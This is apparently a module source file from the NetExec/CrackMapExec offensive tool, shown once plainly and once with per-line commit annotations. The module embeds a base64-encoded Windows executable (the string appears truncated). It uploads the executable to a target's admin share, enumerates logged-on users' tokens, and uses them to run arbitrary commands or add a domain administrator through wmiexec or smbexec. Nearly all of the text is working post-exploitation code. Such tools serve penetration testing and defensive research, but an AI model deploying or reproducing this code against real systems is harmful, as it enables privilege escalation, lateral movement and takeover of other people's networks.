NetExec/cme/modules/impersonate.py

from base64 import b64decode

class CMEModule:

    name = "impersonate"
    description = "List and impersonate tokens to run command as locally logged on users"
    supported_protocols = ["smb"]
    opsec_safe = True # could be flagged
    multiple_hosts = True

    def options(self, context, module_options):
        '''
            MODULE    // Module to use (adduser or exec)
            TOKEN     // Token id to usurp
            CMD       // Command to exec
        '''

        self.tmp_dir = "C:\\Windows\\Temp\\"
        self.share = "C$"
        self.tmp_share = self.tmp_dir.split(":")[1]
        self.impersonate = "Impersonate.exe"
        self.module = self.token = self.cmd = ""
        self.impersonate_embedded = b64decode("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

        if "MODULE" in module_options:
            if module_options["MODULE"] in ("adduser", "list", "exec"):
                self.module = module_options["MODULE"]
            else:
                context.log.error(f"Invalid module name")
                return 
            if "TOKEN" in module_options and "CMD" in module_options:
                self.token = module_options["TOKEN"]
                self.cmd = module_options["CMD"]
        else:
            context.log.error(f"Invalid module, choose between list, adduser and exec")

    def list_available_primary_tokens(self, _, connection):
        command = f"{self.tmp_dir}Impersonate.exe list"
        return connection.execute(command, True)
        
    def on_admin_login(self, context, connection):

        with open("/tmp/Impersonate.exe", 'wb') as impersonate:
            impersonate.write(self.impersonate_embedded)

        context.log.info(f"Uploading {self.impersonate}")
        with open("/tmp/Impersonate.exe", 'rb') as impersonate:
            try:
                connection.conn.putFile(self.share, f"{self.tmp_share}{self.impersonate}", impersonate.read)
                context.log.success(f"Impersonate binary successfully uploaded")
            except Exception as e:
                context.log.error(f"Error writing file to share {self.tmp_share}: {e}")
                return

        try:
            if self.module == "list":
                context.log.info(f"Listing available primary tokens")
                p = self.list_available_primary_tokens(context, connection)
                for line in p.splitlines():
                    token, token_owner = line.split(" ", 1)
                    context.log.highlight(f"Primary token ID: {token} {token_owner}")
            else:
                impersonated_user = ""
                p = self.list_available_primary_tokens(context, connection)
                for line in p.splitlines():
                    token_id, token_owner = line.split(" ", 1)
                    if token_id == self.token:
                        impersonated_user = token_owner.strip()
                        break

                if impersonated_user:  
                    if self.module == "adduser":
                        context.log.info(f"Escalating domain admin impersonating {impersonated_user}")
                        method = "wmiexec"
                    if self.module == "exec":
                        context.log.info(f"Executing {self.cmd} as {impersonated_user}")
                        method="smbexec"
                    command = f"{self.tmp_dir}Impersonate.exe {self.module} {self.token} {self.cmd}"
                    for line in connection.execute(command, True, methods=[method]).splitlines():
                        context.log.highlight(line)
                else:
                    context.log.error(f"Invalid token ID submitted")

        except Exception as e:
            context.log.error(f"Error runing command: {e}")
        finally:
            try:
                connection.conn.deleteFile(self.share, f"{self.tmp_share}{self.impersonate}")
                context.log.success(f"Impersonate binary successfully deleted")
            except Exception as e:
                context.log.error(f"Error deleting Impersonate.exe on {self.share}: {e}")
Final update! 2022-10-27 10:21:46 +00:00			`from base64 import b64decode`
Add files via upload 2022-07-04 12:44:35 +00:00
			`class CMEModule:`

			`name = "impersonate"`
			`description = "List and impersonate tokens to run command as locally logged on users"`
			`supported_protocols = ["smb"]`
			`opsec_safe = True # could be flagged`
			`multiple_hosts = True`

			`def options(self, context, module_options):`
			`'''`
Final update! 2022-10-27 10:21:46 +00:00			`MODULE // Module to use (adduser or exec)`
			`TOKEN // Token id to usurp`
			`CMD // Command to exec`
Add files via upload 2022-07-04 12:44:35 +00:00			`'''`

			`self.tmp_dir = "C:\\Windows\\Temp\\"`
			`self.share = "C$"`
			`self.tmp_share = self.tmp_dir.split(":")[1]`
			`self.impersonate = "Impersonate.exe"`
Final update! 2022-10-27 10:21:46 +00:00			`self.module = self.token = self.cmd = ""`
			self.impersonate_embedded = b64decode("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
Add files via upload 2022-07-04 12:44:35 +00:00
Final update! 2022-10-27 10:21:46 +00:00			`if "MODULE" in module_options:`
			`if module_options["MODULE"] in ("adduser", "list", "exec"):`
			`self.module = module_options["MODULE"]`
			`else:`
			`context.log.error(f"Invalid module name")`
			`return`
			`if "TOKEN" in module_options and "CMD" in module_options:`
			`self.token = module_options["TOKEN"]`
			`self.cmd = module_options["CMD"]`
			`else:`
			`context.log.error(f"Invalid module, choose between list, adduser and exec")`
Add files via upload 2022-07-04 12:44:35 +00:00
Update impersonate.py 2022-07-09 16:34:35 +00:00			`def list_available_primary_tokens(self, _, connection):`
Final update! 2022-10-27 10:21:46 +00:00			`command = f"{self.tmp_dir}Impersonate.exe list"`
Update impersonate.py 2022-07-09 16:34:35 +00:00			`return connection.execute(command, True)`

Add files via upload 2022-07-04 12:44:35 +00:00			`def on_admin_login(self, context, connection):`

			`with open("/tmp/Impersonate.exe", 'wb') as impersonate:`
			`impersonate.write(self.impersonate_embedded)`

			`context.log.info(f"Uploading {self.impersonate}")`
			`with open("/tmp/Impersonate.exe", 'rb') as impersonate:`
			`try:`
			`connection.conn.putFile(self.share, f"{self.tmp_share}{self.impersonate}", impersonate.read)`
Update impersonate.py 2022-07-09 16:34:35 +00:00			`context.log.success(f"Impersonate binary successfully uploaded")`
Add files via upload 2022-07-04 12:44:35 +00:00			`except Exception as e:`
			`context.log.error(f"Error writing file to share {self.tmp_share}: {e}")`
			`return`

			`try:`
Final update! 2022-10-27 10:21:46 +00:00			`if self.module == "list":`
Update impersonate.py 2022-07-09 16:34:35 +00:00			`context.log.info(f"Listing available primary tokens")`
			`p = self.list_available_primary_tokens(context, connection)`
Add files via upload 2022-07-04 12:44:35 +00:00			`for line in p.splitlines():`
Final update! 2022-10-27 10:21:46 +00:00			`token, token_owner = line.split(" ", 1)`
			`context.log.highlight(f"Primary token ID: {token} {token_owner}")`
Add files via upload 2022-07-04 12:44:35 +00:00			`else:`
Update impersonate.py 2022-07-09 16:34:35 +00:00			`impersonated_user = ""`
			`p = self.list_available_primary_tokens(context, connection)`
			`for line in p.splitlines():`
			`token_id, token_owner = line.split(" ", 1)`
Final update! 2022-10-27 10:21:46 +00:00			`if token_id == self.token:`
			`impersonated_user = token_owner.strip()`
Update impersonate.py 2022-07-09 16:34:35 +00:00			`break`
Final update! 2022-10-27 10:21:46 +00:00
			`if impersonated_user:`
			`if self.module == "adduser":`
			`context.log.info(f"Escalating domain admin impersonating {impersonated_user}")`
			`method = "wmiexec"`
			`if self.module == "exec":`
			`context.log.info(f"Executing {self.cmd} as {impersonated_user}")`
			`method="smbexec"`
			`command = f"{self.tmp_dir}Impersonate.exe {self.module} {self.token} {self.cmd}"`
			`for line in connection.execute(command, True, methods=[method]).splitlines():`
			`context.log.highlight(line)`
Update impersonate.py 2022-07-09 16:34:35 +00:00			`else:`
			`context.log.error(f"Invalid token ID submitted")`

Add files via upload 2022-07-04 12:44:35 +00:00			`except Exception as e:`
			`context.log.error(f"Error runing command: {e}")`
			`finally:`
			`try:`
			`connection.conn.deleteFile(self.share, f"{self.tmp_share}{self.impersonate}")`
Final update! 2022-10-27 10:21:46 +00:00			`context.log.success(f"Impersonate binary successfully deleted")`
Add files via upload 2022-07-04 12:44:35 +00:00			`except Exception as e:`
Final update! 2022-10-27 10:21:46 +00:00			`context.log.error(f"Error deleting Impersonate.exe on {self.share}: {e}")`